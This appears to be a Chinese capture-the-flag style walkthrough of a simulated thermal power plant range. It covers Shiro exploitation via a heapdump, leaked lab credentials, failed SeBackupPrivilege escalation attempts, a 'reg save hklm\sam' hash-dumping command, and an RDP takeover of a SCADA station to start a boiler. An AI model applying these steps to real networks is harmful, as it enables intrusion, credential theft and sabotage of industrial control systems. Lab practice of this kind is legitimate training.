春秋云境-ThermalPower

发表于 2025-05-20 分类于云境靶场

内网地址	Host or FQDN	简要描述
172.22.17.213	security	spring + shiro
172.22.17.6	WIN-ENGINEER	SCADA 工程师的个人 PC
172.22.26.11	WIN-SCADA	SCADA 工程师站

shiro

/actuator/heapdump + shiro

密码信息

172.22.17.6:80 泄露敏感信息文档：chenhua/chenhua@0813，登录172.22.17.6发现是Backup Operators 组成员，但是并没有给用户默认分配 SeBackup 权限

C:\Users\chenhua>whoami /groups

组信息
-----------------

组名                                   类型   SID          属性
====================================== ====== ============ ==============================
Everyone                               已知组 S-1-1-0      必需的组, 启用于默认, 启用的组
BUILTIN\Backup Operators               别名   S-1-5-32-551 只用于拒绝的组
BUILTIN\Remote Desktop Users           别名   S-1-5-32-555 必需的组, 启用于默认, 启用的组
BUILTIN\Users                          别名   S-1-5-32-545 必需的组, 启用于默认, 启用的组
NT AUTHORITY\REMOTE INTERACTIVE LOGON  已知组 S-1-5-14     必需的组, 启用于默认, 启用的组
NT AUTHORITY\INTERACTIVE               已知组 S-1-5-4      必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users       已知组 S-1-5-11     必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization         已知组 S-1-5-15     必需的组, 启用于默认, 启用的组
NT AUTHORITY\本地帐户                  已知组 S-1-5-113    必需的组, 启用于默认, 启用的组
LOCAL                                  已知组 S-1-2-0      必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication       已知组 S-1-5-64-10  必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Mandatory Level 标签   S-1-16-8192

C:\Users\chenhua>whoami /priv

特权信息
----------------------

特权名                        描述           状态
============================= ============== ======
SeChangeNotifyPrivilege       绕过遍历检查   已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用

（复现失败）导入两个dll：https://github.com/k4sth4/SeBackupPrivilege

PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Users\chenhua\Desktop> Set-SeBackupPrivilege
PS C:\Users\chenhua\Desktop> Get-SeBackupPrivilege
SeBackupPrivilege is disabled

（复现失败）reg抓密码

reg save hklm\sam sam.hive
错误:客户端没有所需的特权。

（复现失败）https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeBackupPrivilege.ps1

Import-Module .\EnableSeBackupPrivilege.ps1
调试:
 using System;
 using System.Diagnostics;
 using System.Runtime.InteropServices;
 using System.Security.Principal;

 [StructLayout(LayoutKind.Sequential, Pack = 1)]
 public struct TokPriv1Luid
 {
  public int Count;
  public long Luid;
  public int Attr;
 }

 public static class Advapi32
 {
  [DllImport("advapi32.dll", SetLastError=true)]
  public static extern bool OpenProcessToken(
   IntPtr ProcessHandle,
   int DesiredAccess,
   ref IntPtr TokenHandle);

  [DllImport("advapi32.dll", SetLastError=true)]
  public static extern bool LookupPrivilegeValue(
   string lpSystemName,
   string lpName,
   ref long lpLuid);

  [DllImport("advapi32.dll", SetLastError = true)]
  public static extern bool AdjustTokenPrivileges(
   IntPtr TokenHandle,
   bool DisableAllPrivileges,
   ref TokPriv1Luid NewState,
   int BufferLength,
   IntPtr PreviousState,
   IntPtr ReturnLength);

 }

 public static class Kernel32
 {
  [DllImport("kernel32.dll")]
  public static extern uint GetLastError();
 }
调试: Current process handle: 2112
调试: Calling OpenProcessToken()
调试: Token handle: 2136
调试: Calling LookupPrivilegeValue for SeBackupPrivilege
调试: SeBackupPrivilege LUID value: 17
调试: Calling AdjustTokenPrivileges
调试: GetLastError returned: 1300

管理员权限运行cmd即可复现

SCADA

SCADA.txt发现管理员密码，还有一个新网段，扫描rdp登录172.22.26.11，启动锅炉

WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3

勒索病毒解密

一个aes解密就行了